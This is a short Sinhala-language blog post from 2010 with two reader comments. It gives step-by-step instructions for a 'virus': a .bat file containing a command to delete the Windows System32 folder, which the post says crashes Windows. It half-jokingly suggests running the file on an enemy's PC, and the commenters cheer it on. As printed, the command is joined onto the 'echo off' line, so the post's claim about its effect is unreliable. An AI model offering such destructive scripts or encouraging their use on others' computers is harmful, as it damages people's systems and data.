Pages

හොඳ හෝ නරක comment එකක් දාල යන්න අමතක කරන්න එපා.. :)

Wednesday, May 26, 2010

පොඩි ඒත් ටිකක් විතර භයානක virus එකක් හදමුද..??


මේක පොඩි සරල code එකක්.
****මේක බැරි වෙලාවත් ඔයාගෙ computer එකේ නම් run කරන්න එපා..****


1. Notepad එකක් අරන් පහල code එක copy paste කරන්න.

@echo off del c:\windows\system32

2. ඒක කැමති නමකින් save කරගන්න. හැබැයි නම අගට .bat කියල එන්න ඕනෙ.
Eg: virus.bat


****මේක බැරි වෙලාවත් ඔයාගෙ computer එකේ නම් run කරන්න එපා..****
මේකෙන් System32 file එක delete කරනව. Windows crash වෙනව..
වැඩ කරනවද බලන්නම ඕනෙ නම් තරහකාරයෙක්ගෙ PC එකක run කරල බලන්න.. (එහෙම කරන්ඩත් එපා.. පව්නෙ...)

2 comments:

  1. එල එල මචෝ ඔන්න මාත් හදාගත්තා. Run කරලා බලන්නද? හික්ස්.

    http://www.facebook.com/group.php?gid=120074181337432&v=wall

    ReplyDelete
  2. එල එල.. :D ඔන්න මමත් facebook group එකට set වුනා...

    ReplyDelete